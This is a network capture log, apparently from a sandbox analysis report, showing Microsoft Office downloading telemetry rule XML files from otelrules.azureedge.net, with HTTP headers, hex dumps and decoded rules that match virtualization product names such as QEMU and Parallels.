                                                                                                                                                                            2024-10-28 18:12:29 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            60192.168.2.44981313.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:29 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:29 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 485
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                            ETag: "0x8DC582BB9769355"
                                                                                                                                                                            x-ms-request-id: e574f622-301e-0052-4beb-2565d6000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181229Z-r1755647c665dwkwce4e7gadz0000000065g00000000czz2
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:29 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            61192.168.2.44981413.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:29 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:29 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:29 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 411
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                            ETag: "0x8DC582B989AF051"
                                                                                                                                                                            x-ms-request-id: 8e6d5db5-101e-0017-4c27-2747c7000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181229Z-17fbfdc98bbngfjxtncsq24exs0000000770000000001e31
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:29 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            62192.168.2.44981513.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:29 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:29 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:29 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 470
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                            ETag: "0x8DC582BBB181F65"
                                                                                                                                                                            x-ms-request-id: 6cbbe1db-401e-0083-6516-26075c000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181229Z-r1755647c66tsn7nz9wda692z000000003t0000000005mr2
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:29 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            63192.168.2.44981613.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:29 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:29 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                            ETag: "0x8DC582BB556A907"
                                                                                                                                                                            x-ms-request-id: 55f0c68d-501e-008f-5d50-239054000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181229Z-r1755647c66hbclz9tgqkaxg2w00000006w000000000efmp
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:29 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            64192.168.2.44981713.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:30 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:30 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 502
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                            ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                            x-ms-request-id: 4e972348-801e-00ac-276d-28fd65000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181230Z-r1755647c66x7vzx9armv8e3cw000000075g0000000000c5
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:30 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            65192.168.2.44981813.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:30 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:30 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                            ETag: "0x8DC582B9D30478D"
                                                                                                                                                                            x-ms-request-id: 9cbc4178-801e-008f-12a3-262c5d000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181230Z-r1755647c66gqcpzhw8q9nhnq000000006600000000055kb
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:30 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            66192.168.2.44981913.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:30 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:30 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 474
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                            ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                            x-ms-request-id: ffa56774-c01e-007a-6c38-26b877000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181230Z-r1755647c6688lj6g0wg0rqr1400000005ng000000005bd5
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:30 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            67192.168.2.44982013.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:30 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:30 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 408
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                            ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                            x-ms-request-id: 2e5beeba-d01e-002b-6c67-2825fb000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181230Z-r1755647c66ss75qkr31zpy1kc0000000510000000009vkq
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:30 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            68192.168.2.44982113.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:30 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:30 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 469
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                            ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                            x-ms-request-id: df53dfe1-801e-0067-2856-23fe30000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181230Z-17fbfdc98bb8lw78ye6qppf97g00000005v000000000cgr0
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:30 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            69192.168.2.44982213.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:30 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:31 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:31 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 416
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                            ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                            x-ms-request-id: 321a447c-801e-002a-4da3-2631dc000000
                                                                                                                                                                            x-ms-version: 2018-03-28
